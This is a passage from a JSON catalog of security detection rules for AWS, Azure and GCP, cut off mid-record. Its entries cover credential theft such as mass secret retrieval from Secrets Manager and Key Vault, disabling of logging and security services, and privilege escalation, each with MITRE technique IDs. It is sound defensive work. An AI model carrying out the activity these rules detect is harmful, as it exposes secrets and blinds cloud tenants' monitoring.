"detections/cloud/aws-ecr-image-scan-disabled.yaml" }, { "id": "det-cloud-087", "type": "detection", "name": "AWS KMS Key Policy Allows Principal '*'", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS KMS Key Policy Allows Principal '*''.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1552.001" ], "log_source": "aws", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-kms-key-policy-anonymous.yaml" }, { "id": "det-cloud-088", "type": "detection", "name": "AWS KMS ScheduleKeyDeletion Used", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS KMS ScheduleKeyDeletion Used'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "aws", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-kms-schedule-key-deletion.yaml" }, { "id": "det-cloud-089", "type": "detection", "name": "AWS SecretsManager Mass GetSecretValue", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS SecretsManager Mass GetSecretValue'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1552.001" ], "log_source": "aws", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-secretsmanager-mass-getsecret.yaml" }, { "id": "det-cloud-090", "type": "detection", "name": "AWS SSM SecureString Parameter Created Without KMS", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS SSM SecureString Parameter Created Without KMS'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1552.001" ], "log_source": "aws", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ssm-parameter-secure-no-kms.yaml" }, { "id": "det-cloud-091", "type": "detection", "name": "AWS Config Recorder Stopped", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Config Recorder Stopped'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-config-recorder-stopped.yaml" }, { "id": "det-cloud-092", "type": "detection", "name": "AWS GuardDuty Detector Deleted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS GuardDuty Detector Deleted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-guardduty-detector-deleted.yaml" }, { "id": "det-cloud-093", "type": "detection", "name": "AWS SecurityHub DisableSecurityHub", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS SecurityHub DisableSecurityHub'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-securityhub-disabled.yaml" }, { "id": "det-cloud-094", "type": "detection", "name": "AWS CloudTrail Event Selector Narrowed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS CloudTrail Event Selector Narrowed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-cloudtrail-event-selector-narrowed.yaml" }, { "id": "det-cloud-095", "type": "detection", "name": "AWS Organizations Account Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Organizations Account Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-organizations-account-removed.yaml" }, { "id": "det-cloud-096", "type": "detection", "name": "AWS Route53 Domain Transfer Out", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Route53 Domain Transfer Out'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1583.001" ], "log_source": "aws", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-route53-domain-transfer-out.yaml" }, { "id": "det-cloud-097", "type": "detection", "name": "AWS CloudFront Origin Changed Mid-Service", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS CloudFront Origin Changed Mid-Service'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1565.002" ], "log_source": "aws", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-cloudfront-origin-changed.yaml" }, { "id": "det-cloud-098", "type": "detection", "name": "AWS WAF Web ACL Disassociated", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS WAF Web ACL Disassociated'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-waf-web-acl-disassociated.yaml" }, { "id": "det-cloud-099", "type": "detection", "name": "AWS SNS Topic Policy Allows Anonymous Subscribe", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS SNS Topic Policy Allows Anonymous Subscribe'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1098" ], "log_source": "aws", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-sns-topic-public-subscribe.yaml" }, { "id": "det-cloud-100", "type": "detection", "name": "AWS SQS Queue Policy Allows Principal '*'", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS SQS Queue Policy Allows Principal '*''. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1098" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-sqs-queue-public-policy.yaml" }, { "id": "det-cloud-101", "type": "detection", "name": "Entra ID Admin Consent Granted To App", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID Admin Consent Granted To App'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1528" ], "log_source": "azure", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-app-consent-grant.yaml" }, { "id": "det-cloud-102", "type": "detection", "name": "Entra ID App Credential Added Outside Business Hours", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID App Credential Added Outside Business Hours'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098.001" ], "log_source": "azure", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-app-credential-added-out-of-hours.yaml" }, { "id": "det-cloud-103", "type": "detection", "name": "Entra ID Conditional Access Rule Excludes Privileged User", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID Conditional Access Rule Excludes Privileged User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-conditional-access-bypass-rule.yaml" }, { "id": "det-cloud-104", "type": "detection", "name": "Entra ID MFA Method Removed From Privileged User", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID MFA Method Removed From Privileged User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1556.006" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-mfa-method-removed-priv.yaml" }, { "id": "det-cloud-105", "type": "detection", "name": "Entra ID PIM Role Eligibility Self-Assigned", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID PIM Role Eligibility Self-Assigned'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "azure", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-pim-role-eligibility-self-assigned.yaml" }, { "id": "det-cloud-106", "type": "detection", "name": "Entra ID App Granted Directory.ReadWrite.All", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID App Granted Directory.ReadWrite.All'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1098.003" ], "log_source": "azure", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-app-permissions-graph-read-write-all.yaml" }, { "id": "det-cloud-107", "type": "detection", "name": "Entra ID Bulk User Creation Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID Bulk User Creation Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1136.003" ], "log_source": "azure", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-bulk-user-creation.yaml" }, { "id": "det-cloud-108", "type": "detection", "name": "Entra ID Trusted Named Location Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID Trusted Named Location Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-named-location-removed.yaml" }, { "id": "det-cloud-109", "type": "detection", "name": "Entra ID Legacy Authentication Re-Enabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID Legacy Authentication Re-Enabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-legacy-auth-allowed.yaml" }, { "id": "det-cloud-110", "type": "detection", "name": "Entra ID Bulk License Assignment", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID Bulk License Assignment'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "azure", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-bulk-license-assignment.yaml" }, { "id": "det-cloud-111", "type": "detection", "name": "Entra ID Admin Consent Workflow Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID Admin Consent Workflow Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-admin-consent-workflow-disabled.yaml" }, { "id": "det-cloud-112", "type": "detection", "name": "Entra ID SSPR Policy Weakened", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Entra ID SSPR Policy Weakened'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-self-service-pwd-reset-policy-modified.yaml" }, { "id": "det-cloud-113", "type": "detection", "name": "Azure Policy Assignment Deleted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Policy Assignment Deleted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-arm-policy-assignment-deleted.yaml" }, { "id": "det-cloud-114", "type": "detection", "name": "Azure Blueprint Assignment Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Blueprint Assignment Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-arm-blueprint-deleted.yaml" }, { "id": "det-cloud-115", "type": "detection", "name": "Azure Role Assignment Owner At Tenant Scope", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Role Assignment Owner At Tenant Scope'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "azure", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-arm-role-assignment-owner-tenant.yaml" }, { "id": "det-cloud-116", "type": "detection", "name": "Azure ResourceGroup Locks Removed In Bulk", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure ResourceGroup Locks Removed In Bulk'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-arm-locks-removed-bulk.yaml" }, { "id": "det-cloud-117", "type": "detection", "name": "Azure Diagnostic Settings Deleted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Diagnostic Settings Deleted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-arm-diagnostic-settings-deleted.yaml" }, { "id": "det-cloud-118", "type": "detection", "name": "Azure Mass Resource Modify Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Mass Resource Modify Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-arm-mass-resource-modify.yaml" }, { "id": "det-cloud-119", "type": "detection", "name": "Azure Management Group Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Management Group Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-arm-management-group-removed.yaml" }, { "id": "det-cloud-120", "type": "detection", "name": "Azure Subscription Transferred", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Subscription Transferred'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-arm-subscription-transferred.yaml" }, { "id": "det-cloud-121", "type": "detection", "name": "Azure Storage Container Allows Anonymous Read", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Storage Container Allows Anonymous Read'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "azure", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-storage-blob-anonymous-read.yaml" }, { "id": "det-cloud-122", "type": "detection", "name": "Azure Storage Account Firewall Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Storage Account Firewall Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "azure", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-storage-account-firewall-disabled.yaml" }, { "id": "det-cloud-123", "type": "detection", "name": "Azure Storage Shared Access Signature Generated With Long TTL", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Storage Shared Access Signature Generated With Long TTL'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1078" ], "log_source": "azure", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-storage-shared-key-issued.yaml" }, { "id": "det-cloud-124", "type": "detection", "name": "Azure Storage Immutability Policy Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Storage Immutability Policy Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-storage-immutability-removed.yaml" }, { "id": "det-cloud-125", "type": "detection", "name": "Azure Blob Soft Delete Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Blob Soft Delete Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1490" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-storage-soft-delete-disabled.yaml" }, { "id": "det-cloud-126", "type": "detection", "name": "Azure Key Vault Purge Protection Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Key Vault Purge Protection Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-keyvault-purge-protection-disabled.yaml" }, { "id": "det-cloud-127", "type": "detection", "name": "Azure Key Vault Mass GetSecret", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Key Vault Mass GetSecret'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1552.001" ], "log_source": "azure", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-keyvault-secret-mass-get.yaml" }, { "id": "det-cloud-128", "type": "detection", "name": "Azure Key Vault Access Policy Adds Permission '*'", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Key Vault Access Policy Adds Permission '*''.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1098" ], "log_source": "azure", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-keyvault-access-policy-broadened.yaml" }, { "id": "det-cloud-129", "type": "detection", "name": "Azure Key Vault Network ACL Allows All", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Key Vault Network ACL Allows All'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "azure", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-keyvault-firewall-allow-all.yaml" }, { "id": "det-cloud-130", "type": "detection", "name": "Azure Key Vault Key Export Attribute Set", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Key Vault Key Export Attribute Set'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1552" ], "log_source": "azure", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-keyvault-key-export-allowed.yaml" }, { "id": "det-cloud-131", "type": "detection", "name": "Azure AKS Cluster API With Public FQDN", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure AKS Cluster API With Public FQDN'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "azure", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-aks-cluster-public-fqdn.yaml" }, { "id": "det-cloud-132", "type": "detection", "name": "Azure AKS Cluster RBAC Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure AKS Cluster RBAC Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-aks-rbac-disabled.yaml" }, { "id": "det-cloud-133", "type": "detection", "name": "Azure VM RunCommand Invoked", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure VM RunCommand Invoked'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1059" ], "log_source": "azure", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-vm-runcommand.yaml" }, { "id": "det-cloud-134", "type": "detection", "name": "Azure VM CustomScript Extension Installed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure VM CustomScript Extension Installed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1059" ], "log_source": "azure", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-vm-extension-customscript.yaml" }, { "id": "det-cloud-135", "type": "detection", "name": "Azure VM Disk Encryption Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure VM Disk Encryption Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "azure", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-vm-disk-encryption-disabled.yaml" }, { "id": "det-cloud-136", "type": "detection", "name": "GCP IAM Binding Adds allUsers / allAuthenticatedUsers", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP IAM Binding Adds allUsers / allAuthenticatedUsers'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "gcp", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-allusers-binding.yaml" }, { "id": "det-cloud-137", "type": "detection", "name": "GCP Service Account Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Service Account Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1531" ], "log_source": "gcp", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-service-account-disable.yaml" }, { "id": "det-cloud-138", "type": "detection", "name": "GCP iam.serviceAccountUser Grant", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP iam.serviceAccountUser Grant'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "gcp", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-service-account-actas-grant.yaml" }, { "id": "det-cloud-139", "type": "detection", "name": "GCP iam.serviceAccountTokenCreator Grant", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP iam.serviceAccountTokenCreator Grant'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "gcp", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-token-creator-grant.yaml" }, { "id": "det-cloud-140", "type": "detection", "name": "GCP roles/billing.admin Granted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP roles/billing.admin Granted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098" ], "log_source": "gcp", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-billing-admin-grant.yaml" }, { "id": "det-cloud-141", "type": "detection", "name": "GCP Organization Policy Constraint Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Organization Policy Constraint Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-org-policy-disabled.yaml" }, { "id": "det-cloud-142", "type": "detection", "name": "GCP Service Account Key Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Service Account Key Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098.001" ], "log_source": "gcp", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": 